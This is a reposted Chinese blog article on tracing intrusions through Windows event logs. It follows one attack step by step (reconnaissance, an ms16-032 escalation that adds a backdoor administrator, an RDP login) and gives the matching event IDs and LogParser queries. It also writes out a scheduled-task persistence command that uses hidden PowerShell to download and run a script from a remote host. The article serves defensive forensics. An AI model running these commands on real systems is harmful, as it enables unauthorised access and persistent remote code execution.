[安全]在Windows日志里发现入侵痕迹(转载)
转载文章来源:Bypass
有小伙伴问:Windows系统日志分析大多都只是对恶意登录事件进行分析的案例,可以通过系统日志找到其他入侵痕迹吗?
答案肯定是可以的,当攻击者获取webshell后,会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里,而执行操作系统命令的行为也会存在在系统日志。
不同的攻击场景会留下不一样的系统日志痕迹,不同的Event ID代表了不同的意义,需要重点关注一些事件ID,来分析攻击者在系统中留下的攻击痕迹。
我们通过一个攻击案例来进行windows日志分析,从日志里识别出攻击场景,发现恶意程序执行痕迹,甚至还原攻击者的行为轨迹。
1、信息收集
攻击者在获取webshell权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用来辅助权限提升。
whoami
systeminfo
Windows日志分析:
在本地安全策略中,需开启审核进程跟踪,可以跟踪进程创建/终止。关键进程跟踪事件和说明,如:
4688 创建新进程
4689 进程终止
我们通过LogParser做一个简单的筛选,得到Event ID 4688,也就是创建新进程的列表,可以发现用户Bypass,先后调用cmd执行whami和systeminfo。Conhost.exe进程主要是为命令行程序(cmd.exe)提供图形子系统等功能支持。
LogParser.exe -i:EVT “SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,’|’) as UserName,EXTRACT_TOKEN(Strings,5,’|’) as ProcessName FROM c:\11.evtx where EventID=4688”
2、权限提升
通过执行exp来提升权限,获取操作系统system权限,增加管理用户。
ms16-032.exe “whoami”
ms16-032.exe “net user test1 abc123! /add”
ms16-032.exe “net localgroup Administrators test1 /add”
Windows日志分析:
在本地安全策略中,需开启审核账户管理,关键账户管理事件和说明。如:
4720 创建用户
4732 已将成员添加到启用安全性的本地组
这里会涉及进程创建,主要关注账户创建和管理用户组变更。从Event ID 4720 ,系统新建了一个test用户,从Event ID 4732的两条记录变化,得到一个关键信息,本地用户test从user组提升到Administrators。
3、管理账号登录
在创建管理账户后,尝试远程登录到目标主机,获取敏感信息。
mstsc /v 10.1.1.188
Windows日志分析:
在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如:
4624 登录成功
4625 登录失败
LogParser.exe -i:EVT “SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,’|’) as EventType,EXTRACT_TOKEN(Strings,5,’|’) as username,EXTRACT_TOKEN(Strings,18,’|’) as Loginip FROM C:\3333.evtx where EventID=4624”
使用LogParser做一下分析,得到系统登录时间,登录类型10 也就是远程登录,登录用户 test,登录IP:10.1.1.1。
4、权限维持
通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现:
schtasks /create /sc minute /mo 1 /tn “Security Script” /tr “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(””“http://10.1.1.1:8888/logo.txt”""))""
Windows日志分析:
在本地安全策略中,需开启审核对象访问,关键对象访问事件,如:
4698 创建计划任务
4699 删除计划任务
这里涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置:
转载学习!!!非原创!!!
[安全]在Windows日志里发现入侵痕迹(转载)相关推荐
- Hadoop运行程序的时候在日志里发现的错误
在日志里发现下面这个错误 [2021-10-26 19:47:45.029]Container [pid=8097,containerID=container_1635247229913_0031_0 ...
- Windows日志识别入侵痕迹
有小伙伴问:网络上大部分windows系统日志分析都只是对恶意登录事件分析的案例,可以通过系统日志找到其他入侵痕迹吗? 答案肯定是可以的,当攻击者获取webshell后,会通过各种方式来执行系统命令. ...
- Windows主机入侵痕迹排查办法
目录 1.排查思路 1.1.初步筛选排查资产 1.2.确定排查资产 1.3.入侵痕迹排查 2.排查内容 2.1.windows主机 2.1.1.网络连接 2.1.2.敏感目录 2.1.3.后门文件 2 ...
- WINDOWS之入侵痕迹清理总结
Windows的日志文件通常有应用程序日志,安全日志.系统日志.DNS服务器日志.FTP日志.WWW日志等等. 应用程序日志文件:%systemroot%\system32\config\AppEve ...
- Windows 入侵痕迹清理
为避免入侵行为被发现,攻击者总是会通过各种方式来隐藏自己,比如:隐藏自己的真实IP.清除系统日志.删除上传的工具.隐藏后门文件.擦除入侵过程中所产生的痕迹等. 01.Windows日志清除 windo ...
- windows清理_Windows入侵痕迹清理技巧方法总结
为避免入侵行为被发现,攻击者总是会通过各种方式来隐藏自己,比如:隐藏自己的真实IP.清除系统日志.删除上传的工具.隐藏后门文件.擦除入侵过程中所产生的痕迹等. 01.Windows日志清除 windo ...
- window服务器看登录日志文件,【谁登了我的电脑?教你如何查看Windows事件日志】,windows日志...
[谁登了我的电脑?教你如何查看Windows事件日志],windows日志 来源:数据安全与取证(ID:Cflab_net) 原创:Wendy 出于工作需要,除了自己的Mac笔记本,Wendy还配了一 ...
- Web服务器入侵痕迹检测
web站点默认80为服务端口,关于它的各种安全问题不断的发布出来,这些漏洞中一些甚至允许攻击者获得系统管理员的权限进入站点内部,以下是Zenomorph对一些80端口攻击方式的痕迹的研究,和告诉你怎样 ...
- 关于Windows日志
什么是日志? 简单来说,日志就是计算机系统.设备.软件等在某种情况下记录的信息.比如说:防火墙将记录ACL通过和拒绝的消息,磁盘存储系统在故障发生或者在某些系统认为将会发生故障的情况下生成日志信息. ...
- 应急响应-HW之windows 应急响应之入侵排查技巧
windows 应急响应之入侵排查技巧 文章目录 windows 应急响应之入侵排查技巧 常见的应急响应事件分类: 入侵排查思路 0x01 分析入侵过程 0x02 入侵排查方法 一.检查系统账号安全 ...
最新文章
- 关于容器的三件事,你知道吗?
- Loading(二)--ThreeBodyLoadingView
- python学习高级篇(part9)--对象的引用计数
- react 数字转字符_深入浅出 React -- JSX
- 锐捷发布极简以太全光解决方案 打造“不一样”的全光网
- windows server 2019 服务器搭建的方法步骤(图文)
- gblfy大数据技术之安装CentOS系列
- Day06,selenium的剩余用法、万能登录破解和爬取京东商品信息,及破解极验滑动验证码...
- Python 首超 Java 雄霸5月编程语言指数榜!
- mysql 不等于查询优化_MySQL查询性能优化
- bcp sqlcmd bulkinsert在unicode问题,Unexpected EOF encountered in BCP data-file
- 简单理解下用户体验五要素
- 穿山甲 groMore 配置广告位 穿山甲/优良汇
- 7.3 pgfplots点集
- 【前端】页面适配?移动端适配屏幕的各种解决方案!
- NAACL 2021 上的图神经网络好文
- 00 大数据架构课程导论
- 中海达ihand30手簿使用说明_中海达iHand30 手簿使用说明书
- 软件项目管理考试大纲
- 同等学力申硕-经济学
热门文章
- 编译警告:backslash and newline separated by space
- 移动端背景图片自适应
- Java swing的主题风格设置
- iOS UIViewController跳转
- 你想学Python爬虫?看看这篇关于开发者工具神器的博客吧
- linux 复制文件加后缀,linux shell 取文件名后缀
- 你弄懂了Spark的Shuffle实现方式吗?手把手带你解析Spark的Sort Shuffle和Tungsten-Sort Shuffle
- python数字金额转换为中文大写金额
- cpu开启超线程linux,Linux开发人员声称除非禁用超线程否则可以利用英特尔CPU
- 怎样快速生成一个动态二维码?动态个性二维码怎么做?